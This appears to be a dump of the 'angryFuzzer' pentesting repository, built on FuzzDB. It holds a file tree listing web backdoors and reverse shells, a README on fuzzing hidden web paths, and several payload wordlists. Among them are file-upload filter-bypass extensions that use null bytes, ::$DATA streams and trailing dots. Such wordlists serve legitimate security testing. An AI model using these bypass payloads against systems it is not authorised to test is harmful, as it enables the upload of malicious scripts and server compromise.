├── README.md ├── angryFuzzer.py ├── fuzzdb ├── README.md ├── _copyright.txt ├── attack │ ├── README.md │ ├── all-attacks │ │ ├── all-attacks-unix.txt │ │ ├── all-attacks-win.txt │ │ └── all-attacks-xplatform.txt │ ├── business-logic │ │ ├── CommonDebugParamNames.txt │ │ ├── CommonMethodNames.txt │ │ └── DebugParams.Json.fuzz.txt │ ├── control-chars │ │ ├── HexValsAllBytes.txt │ │ ├── NullByteRepresentations.txt │ │ ├── imessage.txt │ │ └── terminal-escape-codes.txt │ ├── disclosure-directory │ │ └── directory-indexing-generic.txt │ ├── disclosure-localpaths │ │ └── unix │ │ │ └── common-unix-httpd-log-locations.txt │ ├── disclosure-source │ │ ├── README.md │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── source-disclosure-generic.txt │ │ └── source-disclosure-microsoft.txt │ ├── email │ │ ├── invalid-email-addresses.txt │ │ └── valid-email-addresses.txt │ ├── file-upload │ │ ├── README.md │ │ ├── alt-extensions-asp.txt │ │ ├── alt-extensions-coldfusion.txt │ │ ├── alt-extensions-jsp.txt │ │ ├── alt-extensions-perl.txt │ │ ├── alt-extensions-php.txt │ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt │ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt │ │ ├── file-ul-filter-bypass-microsoft-asp.txt │ │ ├── file-ul-filter-bypass-ms-php.txt │ │ ├── file-ul-filter-bypass-x-platform-generic.txt │ │ ├── file-ul-filter-bypass-x-platform-php.txt │ │ ├── invalid-filenames-linux.txt │ │ ├── invalid-filenames-microsoft.txt │ │ ├── invalid-filesystem-chars-microsoft.txt │ │ ├── invalid-filesystem-chars-osx.txt │ │ └── malicious-images │ │ │ ├── POC_img_phpinfo-CR.gif │ │ │ ├── POC_img_phpinfo-LF-CR.gif │ │ │ ├── POC_phpinfo-metadata.gif │ │ │ ├── POC_phpinfo-metadata.jpg │ │ │ ├── README.md │ │ │ ├── eicar.com.txt │ │ │ ├── lottapixel.jpg │ │ │ ├── uber.gif │ │ │ └── xssproject.swf │ ├── format-strings │ │ └── format-strings.txt │ ├── html_js_fuzz │ │ ├── HTML5sec_Injections.txt │ │ ├── html_attributes.txt │ │ ├── html_tags.txt │ │ ├── 
javascript_events.txt │ │ ├── js_inject.txt │ │ └── quotationmarks.txt │ ├── http-protocol │ │ ├── README.md │ │ ├── crlf-injection.txt │ │ ├── docs.http-method-defs.html │ │ ├── hpp.txt │ │ ├── http-header-cache-poison.txt │ │ ├── http-protocol-methods.txt │ │ ├── http-request-header-field-names.txt │ │ ├── http-response-header-field-names.txt │ │ ├── known-uri-types.txt │ │ └── user-agents.txt │ ├── integer-overflow │ │ └── integer-overflows.txt │ ├── ip │ │ └── localhost.txt │ ├── json │ │ └── JSON_Fuzzing.txt │ ├── ldap │ │ ├── README.md │ │ └── ldap-injection.txt │ ├── lfi │ │ ├── JHADDIX_LFI.txt │ │ ├── README.md │ │ ├── common-ms-httpd-log-locations.txt │ │ └── common-unix-httpd-log-locations.txt │ ├── mimetypes │ │ └── MimeTypes.txt │ ├── no-sql-injection │ │ ├── Readme.md │ │ └── mongodb.txt │ ├── os-cmd-execution │ │ ├── Commands-Linux.txt │ │ ├── Commands-OSX.txt │ │ ├── Commands-Windows.txt │ │ ├── Commands-WindowsPowershell.txt │ │ ├── OSCommandInject.Windows.txt │ │ ├── README.md │ │ ├── command-execution-unix.txt │ │ ├── command-injection-template.txt │ │ ├── shell-delimiters.txt │ │ ├── shell-operators.txt │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── useful-commands-unix.txt │ │ └── useful-commands-windows.txt │ ├── os-dir-indexing │ │ └── directory-indexing.txt │ ├── path-traversal │ │ ├── README.md │ │ ├── path-traversal-windows.txt │ │ └── traversals-8-deep-exotic-encoding.txt │ ├── redirect │ │ ├── README.md │ │ ├── redirect-injection-template.txt │ │ └── redirect-urls-template.txt │ ├── rfi │ │ ├── README.md │ │ └── rfi.txt │ ├── server-side-include │ │ └── server-side-includes-generic.txt │ ├── sql-injection │ │ ├── detect │ │ │ ├── GenericBlind.txt │ │ │ ├── Generic_SQLI.txt │ │ │ ├── MSSQL.txt │ │ │ ├── MSSQL_blind.txt │ │ │ ├── MySQL.txt │ │ │ ├── MySQL_MSSQL.txt │ │ │ ├── README.md │ │ │ ├── oracle.txt │ │ │ └── xplatform.txt │ │ ├── exploit │ │ │ ├── README.md │ │ │ ├── db2-enumeration.txt │ │ │ ├── ms-sql-enumeration.txt │ │ │ ├── 
mysql-injection-login-bypass.txt │ │ │ ├── mysql-read-local-files.txt │ │ │ └── postgres-enumeration.txt │ │ └── payloads-sql-blind │ │ │ ├── README.md │ │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt │ │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ │ └── payloads-sql-blind-MySQL-WHERE.txt │ ├── string-expansion │ │ └── shell-expansion.txt │ ├── unicode │ │ ├── README.md │ │ ├── corrupted.txt │ │ ├── emoji.txt │ │ ├── japanese-emoticon.txt │ │ ├── naughty-unicode.txt │ │ ├── regionalindicators.txt │ │ ├── right-to-left.txt │ │ ├── specialchars.txt │ │ ├── two-byte-chars.txt │ │ └── upsidedown.txt │ ├── xml │ │ └── xml-attacks.txt │ ├── xpath │ │ ├── README.md │ │ └── xpath-injection.txt │ └── xss │ │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt │ │ ├── README.md │ │ ├── XSSPolyglot.txt │ │ ├── all-encodings-of-lt.txt │ │ ├── default-javascript-event-attributes.txt │ │ ├── html-event-attributes.txt │ │ ├── test.xxe │ │ ├── xss-other.txt │ │ ├── xss-rsnake.txt │ │ └── xss-uri.txt ├── discovery │ ├── UserAgent │ │ ├── UserAgentListCommon.txt │ │ ├── UserAgentListLarge.txt │ │ └── UserAgents.txt │ ├── dns │ │ ├── CcTLD.txt │ │ ├── alexaTop1mAXFRcommonSubdomains.txt │ │ ├── dnsmapCommonSubdomains.txt │ │ └── gTLD.txt │ └── predictable-filepaths │ │ ├── KitchensinkDirectories.txt │ │ ├── Randomfiles.txt │ │ ├── UnixDotfiles.txt │ │ ├── backdoors │ │ ├── ASP_CommonBackdoors.txt │ │ ├── bot_control_panels.txt │ │ └── shells.txt │ │ ├── cgi │ │ ├── CGI_HTTP_POST.txt │ │ ├── CGI_HTTP_POST_Windows.txt │ │ ├── CGI_Microsoft.txt │ │ └── CGI_XPlatform.txt │ │ ├── cms │ │ ├── README.md │ │ ├── drupal_plugins.txt │ │ ├── drupal_themes.txt │ │ ├── joomla_plugins.txt │ │ ├── joomla_themes.txt │ │ ├── php-nuke.txt │ │ ├── wordpress.txt │ │ ├── wp_common_theme_files.txt │ │ ├── wp_plugins.txt │ │ ├── wp_plugins_top225.txt │ │ ├── wp_themes.readme │ │ └── wp_themes.txt │ │ ├── dicc.txt │ │ ├── 
filename-dirname-bruteforce │ │ ├── 3CharExtBrute.txt │ │ ├── CommonWebExtensions.txt │ │ ├── Extensions.Backup.txt │ │ ├── Extensions.Common.txt │ │ ├── Extensions.Compressed.txt │ │ ├── Extensions.Mostcommon.txt │ │ ├── Extensions.Skipfish.txt │ │ ├── WordlistSkipfish.txt │ │ ├── copy_of.txt │ │ ├── raft-large-directories-lowercase.txt │ │ ├── raft-large-directories.txt │ │ ├── raft-large-extensions-lowercase.txt │ │ ├── raft-large-extensions.txt │ │ ├── raft-large-files-lowercase.txt │ │ ├── raft-large-files.txt │ │ ├── raft-large-words-lowercase.txt │ │ ├── raft-large-words.txt │ │ ├── raft-medium-directories-lowercase.txt │ │ ├── raft-medium-directories.txt │ │ ├── raft-medium-extensions-lowercase.txt │ │ ├── raft-medium-extensions.txt │ │ ├── raft-medium-files-lowercase.txt │ │ ├── raft-medium-files.txt │ │ ├── raft-medium-words-lowercase.txt │ │ ├── raft-medium-words.txt │ │ ├── raft-small-directories-lowercase.txt │ │ ├── raft-small-directories.txt │ │ ├── raft-small-extensions-lowercase.txt │ │ ├── raft-small-extensions.txt │ │ ├── raft-small-files-lowercase.txt │ │ ├── raft-small-files.txt │ │ ├── raft-small-words-lowercase.txt │ │ ├── raft-small-words.txt │ │ ├── spanish.txt │ │ ├── test_demo.txt │ │ └── upload_variants.txt │ │ ├── login-file-locations │ │ ├── Logins.txt │ │ ├── cfm.txt │ │ ├── html.txt │ │ ├── jsp.txt │ │ ├── php.txt │ │ ├── windows-asp.txt │ │ └── windows-aspx.txt │ │ ├── password-file-locations │ │ └── Passwords.txt │ │ ├── php │ │ ├── PHP.txt │ │ └── PHP_CommonBackdoors.txt │ │ ├── proxy-conf.txt │ │ ├── tftp.txt │ │ ├── webservers-appservers │ │ ├── ADFS.txt │ │ ├── AdobeXML.txt │ │ ├── Apache.txt │ │ ├── ApacheTomcat.txt │ │ ├── Apache_Axis.txt │ │ ├── ColdFusion.txt │ │ ├── FatwireCMS.txt │ │ ├── Frontpage.txt │ │ ├── HP_System_Mgmt_Homepage.txt │ │ ├── HTTP_POST_Microsoft.txt │ │ ├── Hyperion.txt │ │ ├── IIS.txt │ │ ├── JBoss.txt │ │ ├── JRun.txt │ │ ├── JavaServlets_Common.txt │ │ ├── Joomla_exploitable.txt │ │ ├── 
LotusNotes.txt │ │ ├── Netware.txt │ │ ├── Oracle9i.txt │ │ ├── OracleAppServer.txt │ │ ├── README.md │ │ ├── Ruby_Rails.txt │ │ ├── SAP.txt │ │ ├── Sharepoint.txt │ │ ├── SiteMinder.txt │ │ ├── SunAppServerGlassfish.txt │ │ ├── SuniPlanet.txt │ │ ├── Vignette.txt │ │ ├── Weblogic.txt │ │ └── Websphere.txt │ │ └── wellknown-rfc5785.txt ├── docs │ ├── attack-docs │ │ ├── remote-cmd-exfiltration │ │ │ ├── Web-Shells-rev2.pdf │ │ │ ├── netcat_cheat_sheet_v1.pdf │ │ │ └── windows_command_line_sheet_v1.pdf │ │ ├── rfi-cheatsheet.html │ │ ├── source-directory-file-indexing-cheatsheet.html │ │ ├── sqli │ │ │ ├── docs.oracle_cheat.pdf │ │ │ └── docs.sql_injection_cheatsheet.html │ │ ├── waf-bypass │ │ │ └── regexp-security-cheatsheet.md │ │ └── xss │ │ │ └── docs.wasc-scriptmapping │ │ │ ├── ScriptMapping_Release_26Nov2007.html │ │ │ ├── images │ │ │ ├── ff2.png │ │ │ ├── ie7.png │ │ │ └── safari3.png │ │ │ └── license.txt │ └── misc │ │ ├── KL0209LIT_fffap.html │ │ ├── Web-Shells-rev2.pdf │ │ ├── Wireshark_Display_Filters.pdf │ │ └── htmlcodes-cheatsheet.htm ├── regex │ ├── README.md │ ├── amazon.txt │ ├── breakpoint-ignores.txt │ ├── errors.txt │ ├── nsa-wordlist.txt │ ├── pii.readme.txt │ ├── pii.txt │ └── sessionid.txt ├── web-backdoors │ ├── README.md │ ├── asp │ │ ├── cmd-asp-5.1.asp │ │ ├── cmd.asp │ │ ├── cmd.aspx │ │ ├── cmdasp.asp │ │ ├── cmdasp.aspx │ │ ├── dns.asp │ │ ├── file.asp │ │ ├── list.asp │ │ ├── list.txt │ │ ├── ntdaddy.asp │ │ ├── proxy.asp │ │ ├── shell.asp │ │ ├── shell.aspx │ │ └── up.asp │ ├── c │ │ └── cmd.c │ ├── cfm │ │ ├── cfExec.cfm │ │ ├── cfSQL.cfm │ │ ├── cmd.cfm │ │ └── shell.cfm │ ├── exe │ │ └── nc.exe │ ├── jsp │ │ ├── CmdServlet.class │ │ ├── CmdServlet.java │ │ ├── ListServlet.class │ │ ├── ListServlet.java │ │ ├── UpServlet.class │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── laudanum │ │ │ ├── cmd.war │ │ │ ├── makewar.sh │ │ │ └── warfiles │ │ │ │ ├── META-INF │ │ │ │ 
└── MANIFEST.MF │ │ │ │ ├── WEB-INF │ │ │ │ └── web.xml │ │ │ │ └── cmd.jsp │ │ ├── list.jsp │ │ ├── simple.jsp │ │ ├── up.jsp │ │ └── win32 │ │ │ ├── cmd_win32.jsp │ │ │ └── up_win32.jsp │ ├── php │ │ ├── cmd.php │ │ ├── dns.php │ │ ├── file.php │ │ ├── host.php │ │ ├── killnc.php │ │ ├── list.php │ │ ├── php-backdoor.php │ │ ├── php-reverse-shell.php │ │ ├── proxy.php │ │ ├── shell.php │ │ ├── simple-backdoor.php │ │ ├── tiny.php │ │ └── up.php │ ├── pl-cgi │ │ ├── cmd.pl │ │ ├── list.pl │ │ ├── perlcmd.cgi │ │ └── up.pl │ ├── servlet │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ └── UpServlet.java │ ├── sh │ │ ├── cmd.sh │ │ ├── list.sh │ │ └── up.sh │ └── wordpress │ │ ├── laudanum.php │ │ └── templates │ │ ├── README.md │ │ ├── dns.php │ │ ├── file.php │ │ ├── host.php │ │ ├── ipcheck.php │ │ ├── killnc.php │ │ ├── php-reverse-shell.php │ │ ├── proxy.php │ │ ├── settings.php │ │ └── shell.php ├── wordlists-misc │ ├── accidental_profanity.txt │ ├── common-http-ports.txt │ ├── numeric.txt │ ├── us_cities.txt │ ├── wordlist-alphanumeric-case.txt │ ├── wordlist-common-snmp-community-strings.txt │ └── wordlist-dna.txt └── wordlists-user-passwd │ ├── db2 │ ├── db2_default_pass.txt │ ├── db2_default_user.txt │ └── db2_default_userpass.txt │ ├── faithwriters.txt │ ├── generic-listpairs │ ├── http_default_pass.txt │ ├── http_default_userpass.txt │ └── http_default_users.txt │ ├── names │ └── namelist.txt │ ├── oracle │ ├── _hci_oracle_passwords.txt │ ├── _oracle_default_passwords.txt │ ├── oracle_login_password.txt │ ├── oracle_logins.txt │ └── oracle_passwords.txt │ ├── passwds │ ├── john.txt │ ├── phpbb.txt │ ├── twitter.txt │ └── weaksauce.txt │ ├── postgres │ ├── postgres_default_pass.txt │ ├── postgres_default_user.txt │ └── postgres_default_userpass.txt │ ├── readme.txt │ ├── tomcat │ ├── tomcat_mgr_default_pass.txt │ ├── tomcat_mgr_default_userpass.txt │ └── tomcat_mgr_default_users.txt │ └── unix-os │ ├── unix_passwords.txt │ └── unix_users.txt ├── lib 
├── __init__.py ├── __init__.pyc ├── colors.py └── colors.pyc └── requirements.txt /README.md: -------------------------------------------------------------------------------- 1 | # AngryFuzz3r 2 | ![screen_1](http://i.imgur.com/QetqbO1.png) 3 | 4 | Status: **Development** 5 | ## About the AngryFuzz3r project 6 | AngryFuzz3r is a collection of pentesting tools for gathering information and discovering vulnerabilities in targets, based on the FuzzDB project (https://github.com/fuzzdb-project/fuzzdb). 7 | ## UrlFuzz3r->AngryFuzz3r_1 8 | Discover hidden files and directories on a web server. The application tries to find relative URL paths on the given website by checking them against a given set of candidate paths. 9 | 10 | ## Features 11 | 12 | * Fuzz url set from an input file 13 | * Concurrent relative path search 14 | * Configurable number of fuzzing workers 15 | * Fuzz CMS ==> WordPress, Drupal, Joomla 16 | * Generate reports of the valid paths 17 | ## Usage 18 | 19 | ~~~ 20 | $ python angryFuzzer.py -h 21 | Usage: angryFuzzer.py [options] 22 | 23 | Options: 24 | -h, --help show this help message and exit 25 | -q, --quiet Silent mode ,only reports 26 | -u URL, --url=URL URL of the Target 27 | -c CMS, --cms=CMS scan CMS ==> wp ,dp 28 | -w WORDLIST, --wordlist=WORDLIST 29 | Custom wordlist 30 | 31 | ~~~ 32 | 33 | Example: 34 | * Fuzzing a URL with the default dictionary 35 | ~~~ 36 | python angryFuzzer.py -u http://127.0.0.1 37 | ~~~ 38 | 39 | * Fuzzing a CMS (wp in this example) 
40 | ~~~ 41 | python angryFuzzer.py -u http://127.0.0.1 --cms wp 42 | ~~~ 43 | 44 | * Fuzzing with a custom wordlist 45 | ~~~ 46 | python angryFuzzer.py -u http://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt 47 | ~~~ 48 | ![screen_2](http://i.imgur.com/0C4Lb42.png) 49 | 50 | 51 | 52 | ## How to install 53 | ##### Clone 54 | - Clone the repository with: 55 | ```sh 56 | $ git clone https://github.com/ihebski/angryFuzzer.git 57 | $ cd angryFuzzer 58 | $ python angryFuzzer.py 59 | ``` 60 | ##### Dependencies 61 | * Install the required dependencies with: 62 | ```bash 63 | $ sudo pip install -r requirements.txt 64 | ``` 65 | ## License 66 | The MIT License (MIT) 67 | -------------------------------------------------------------------------------- /fuzzdb/attack/README.md: -------------------------------------------------------------------------------- 1 |

FuzzDB Attack Patterns

2 | 3 | **WAF Evasion**
4 | * Regexp security Cheatsheet 5 | * Source: https://github.com/attackercan/regexp-security-cheatsheet/blob/master/README.md 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/all-attacks/all-attacks-xplatform.txt: -------------------------------------------------------------------------------- 1 | !' 2 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 3 | !@#0%^#0##018387@#0^^**(() 4 | "><"test@address.com 24 | a"b(c)d,e:f;gi[j\k]l@example.com 25 | this is"not\allowed@example.com 26 | notallowed@example.com 27 | notallowed@example.com 28 | -------------------------------------------------------------------------------- /fuzzdb/attack/email/valid-email-addresses.txt: -------------------------------------------------------------------------------- 1 | email@eaddress.com 2 | firstname.lastname@address.com 3 | email@subdomain.address.com 4 | firstname+lastname@address.com 5 | name@129.129.129.129 6 | name@[129.129.129.129] 7 | 0123456789@address.com 8 | email@address-one.com 9 | email@address.name 10 | email@address.co.jp 11 | firstname-lastname@address.com 12 | much."more\ unusual"@address.com 13 | very.unusual."@".unusual.com@address.com 14 | very."(),:;<>[]".VERY."very@\\ "very".unusual@strange.address.com 15 | abcdefghijklmnopqrstuvwxyz!#$%&'*+-/=?^_`{|}~.0123456789@abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.com 16 | {jacco'vantuijl}@address.server 17 | "Jacco\@test"@address.com 18 | "Jacco van Tuijl"@address.com 19 | "Jacco\\test"@address.com 20 | "Jacco@test"@address.com 21 | Jacco/van=Tuijl@address.com 22 | \$A12345@address.com 23 | !def!abc%dfg@address.com 24 | _jacco@address.com 25 | a.long.email.address.test@dept.address.com 26 | "jacco.vantuijl.@.address.com"@address.com 27 | jacco@mailserver1 28 | #!$%&'*+-/=?^_`{}|~@address.org 29 | "()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a"@address.org 30 | " "@address.org 31 | üñîçøðé@address.com 32 | address@üñîçøðé.com 33 | üñîçøðé@üñîçøðé.com 
-------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-asp.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | asa 4 | aSP 5 | aSpx 6 | aSa 7 | asp%20%20%20 8 | aspx%20%20%20 9 | asa%20%20%20 10 | aSP%20%20%20 11 | aSpx%20%20%20 12 | aSa%20%20%20 13 | asp...... 14 | aspx...... 15 | asa...... 16 | aSP...... 17 | aSpx...... 18 | aSa...... 19 | asp%20%20%20...%20.%20.. 20 | aspx%20%20%20...%20.%20.. 21 | asa%20%20%20...%20.%20.. 22 | aSP%20%20%20...%20.%20.. 23 | aSpx%20%20%20...%20.%20.. 24 | aSa%20%20%20...%20.%20.. 25 | asp%00 26 | aspx%00 27 | asa%00 28 | aSp%00 29 | aSpx%00 30 | aSa%00 31 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-coldfusion.txt: -------------------------------------------------------------------------------- 1 | cfm 2 | cfml 3 | cfc 4 | dbm 5 | cFm 6 | cFml 7 | cFc 8 | dBm 9 | cfm%20%20%20 10 | cfml%20%20%20 11 | cfc%20%20%20 12 | dbm%20%20%20 13 | cFm%20%20%20 14 | cFml%20%20%20 15 | cFc%20%20%20 16 | dBm%20%20%20 17 | cfm...... 18 | cfml...... 19 | cfc....... 20 | dbm...... 21 | cFm...... 22 | cFml...... 23 | cFc...... 24 | dBm...... 25 | cfm%20%20%20...%20.%20.. 26 | cfml%20%20%20...%20.%20.. 27 | cfc%20%20%20...%20.%20.. 28 | dbm%20%20%20...%20.%20.. 29 | cFm%20%20%20...%20.%20.. 30 | cFml%20%20%20...%20.%20.. 31 | cFc%20%20%20...%20.%20.. 32 | dBm%20%20%20...%20.%20.. 33 | cfm%00 34 | cfml%00 35 | cfc%00 36 | dbm%00 37 | cFm%00 38 | cFml%00 39 | cFc%00 40 | dBm%00 41 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-jsp.txt: -------------------------------------------------------------------------------- 1 | jsp 2 | jspx 3 | jsw 4 | jsv 5 | jspf 6 | jSp 7 | jSpx 8 | jSw 9 | jSv 10 | jSpf 11 | jSp%00 12 | jSp%20%20%20 13 | jSp%20%20%20...%20.%20..a 14 | jSp...... 
15 | jSpf%00 16 | jSpf%20%20%20 17 | jSpf%20%20%20...%20.%20..a 18 | jSpf...... 19 | jSpx%00 20 | jSpx%20%20%20 21 | jSpx%20%20%20...%20.%20..a 22 | jSpx...... 23 | jSv%00 24 | jSv%20%20%20 25 | jSv%20%20%20...%20.%20..a 26 | jSv...... 27 | jSw%00 28 | jSw%20%20%20 29 | jSw%20%20%20...%20.%20..a 30 | jSw...... 31 | jsp%00 32 | jsp%20%20%20 33 | jsp%20%20%20...%20.%20..a 34 | jsp...... 35 | jspf%00 36 | jspf%20%20%20 37 | jspf%20%20%20...%20.%20..a 38 | jspf...... 39 | jspx%00 40 | jspx%20%20%20 41 | jspx%20%20%20...%20.%20..a 42 | jspx...... 43 | jsv%00 44 | jsv%20%20%20 45 | jsv%20%20%20...%20.%20..a 46 | jsv...... 47 | jsw%00 48 | jsw%20%20%20 49 | jsw%20%20%20...%20.%20..a 50 | jsw...... 51 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-perl.txt: -------------------------------------------------------------------------------- 1 | # .pm .lib cannot be called directly, must be called as modules 2 | pl 3 | pm 4 | cgi 5 | pL 6 | pM 7 | cGi 8 | lib 9 | lIb 10 | cGi%00 11 | cGi%20%20%20 12 | cGi...... 13 | cgi%00 14 | cgi%20%20%20 15 | cgi...... 16 | lIb%00 17 | lIb%20%20%20 18 | lIb...... 19 | lib%00 20 | lib%20%20%20 21 | lib...... 22 | pL%00 23 | pL%20%20%20 24 | pL...... 25 | pM%00 26 | pM%20%20%20 27 | pM...... 28 | pl%00 29 | pl%20%20%20 30 | pl...... 31 | pm%00 32 | pm%20%20%20 33 | pm...... 34 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/alt-extensions-php.txt: -------------------------------------------------------------------------------- 1 | phtml 2 | php 3 | php3 4 | php4 5 | php5 6 | inc 7 | pHtml 8 | pHp 9 | pHp3 10 | pHp4 11 | pHp5 12 | iNc 13 | iNc%00 14 | iNc%20%20%20 15 | iNc%20%20%20...%20.%20.. 16 | iNc...... 17 | inc%00 18 | inc%20%20%20 19 | inc%20%20%20...%20.%20.. 20 | inc...... 21 | pHp%00 22 | pHp%20%20%20 23 | pHp%20%20%20...%20.%20.. 24 | pHp...... 
25 | pHp3%00 26 | pHp3%20%20%20 27 | pHp3%20%20%20...%20.%20.. 28 | pHp3...... 29 | pHp4%00 30 | pHp4%20%20%20 31 | pHp4%20%20%20...%20.%20.. 32 | pHp4...... 33 | pHp5%00 34 | pHp5%20%20%20 35 | pHp5%20%20%20...%20.%20.. 36 | pHp5...... 37 | pHtml%00 38 | pHtml%20%20%20 39 | pHtml%20%20%20...%20.%20.. 40 | pHtml...... 41 | php%00 42 | php%20%20%20 43 | php%20%20%20...%20.%20.. 44 | php...... 45 | php3%00 46 | php3%20%20%20 47 | php3%20%20%20...%20.%20.. 48 | php3...... 49 | php4%00 50 | php4%20%20%20 51 | php4%20%20%20...%20.%20.. 52 | php4...... 53 | php5%00 54 | php5%20%20%20 55 | php5%20%20%20...%20.%20.. 56 | php5...... 57 | phtml%00 58 | phtml%20%20%20 59 | phtml%20%20%20...%20.%20.. 60 | phtml...... 61 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt: -------------------------------------------------------------------------------- 1 | templates_compiled 2 | templates_c 3 | templates 4 | temporary 5 | images 6 | cache 7 | temp 8 | files 9 | tmp 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}.{EXT} 3 | {ASPSCRIPT}; 4 | {ASPSCRIPT};.{EXT} 5 | {ASPSCRIPT}%00 6 | {ASPSCRIPT}%00.{EXT} 7 | {ASPSCRIPT}::data%00. 
8 | {ASPSCRIPT}::data%00.{EXT} 9 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}; 3 | {ASPSCRIPT};.jpg 4 | {ASPSCRIPT};.pdf 5 | {ASPSCRIPT};.html 6 | {ASPSCRIPT};.htm 7 | {ASPSCRIPT};.txt 8 | {ASPSCRIPT};.xyz 9 | {ASPSCRIPT};.zip 10 | {ASPSCRIPT};.tgz 11 | {ASPSCRIPT};.doc 12 | {ASPSCRIPT};.docx 13 | {ASPSCRIPT};.xls 14 | {ASPSCRIPT};.xlsx 15 | {ASPSCRIPT}%00.jpg 16 | {ASPSCRIPT}%00.pdf 17 | {ASPSCRIPT}%00.html 18 | {ASPSCRIPT}%00.txt 19 | {ASPSCRIPT}%00.xyz 20 | {ASPSCRIPT}%00.tgz 21 | {ASPSCRIPT}%00.zip 22 | {ASPSCRIPT}%00.doc 23 | {ASPSCRIPT}%00.docx 24 | {ASPSCRIPT}%00 25 | {ASPSCRIPT}::data%00.jpg 26 | {ASPSCRIPT}::data%00.pdf 27 | {ASPSCRIPT}::data%00.html 28 | {ASPSCRIPT}::data%00.txt 29 | {ASPSCRIPT}::data%00.zip 30 | {ASPSCRIPT}::data%00.doc 31 | {ASPSCRIPT}::data%00.xls 32 | {ASPSCRIPT}%00%20%20%20 33 | {ASPSCRIPT}%00%20%20%20...%20.%20.. 34 | {ASPSCRIPT}%00...... 35 | {ASPSCRIPT}%20%20%20 36 | {ASPSCRIPT}%20%20%20...%20.%20.. 37 | {ASPSCRIPT}...... 38 | {ASPSCRIPT}::data%00%%20%20%20 39 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20.. 40 | {ASPSCRIPT}::data%00%...... 
41 | {ASPSCRIPT}%00%20%20%20;.jpg 42 | {ASPSCRIPT}%00%20%20%20;.doc 43 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg 44 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.doc 45 | {ASPSCRIPT}%00......;.jpg 46 | {ASPSCRIPT}%00......;.doc 47 | {ASPSCRIPT}%20%20%20;.jpg 48 | {ASPSCRIPT}%20%20%20;.doc 49 | {ASPSCRIPT}%20%20%20...%20.%20..;.jpg 50 | {ASPSCRIPT}%20%20%20...%20.%20..;.doc 51 | {ASPSCRIPT}......;.jpg 52 | {ASPSCRIPT}......;.doc 53 | {ASPSCRIPT}::data%00%%20%20%20;.jpg 54 | {ASPSCRIPT}::data%00%%20%20%20;.doc 55 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg 56 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc 57 | {ASPSCRIPT}::data%00%......;.jpg 58 | {ASPSCRIPT}::data%00%......;.doc 59 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-ms-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php::$DATA 5 | {PHPSCRIPT}.php.php.rar 6 | {PHPSCRIPT}.php.rar 7 | {PHPSCRIPT}::$DATA 8 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt: -------------------------------------------------------------------------------- 1 | %00index.html 2 | ;index.html 3 | %00 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php.php.rar 5 | {PHPSCRIPT}.php.rar 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filenames-linux.txt: -------------------------------------------------------------------------------- 1 | / 2 | 3 | \0 4 | /dev/null 5 | /dev/null/foo 6 | . 7 | .. 
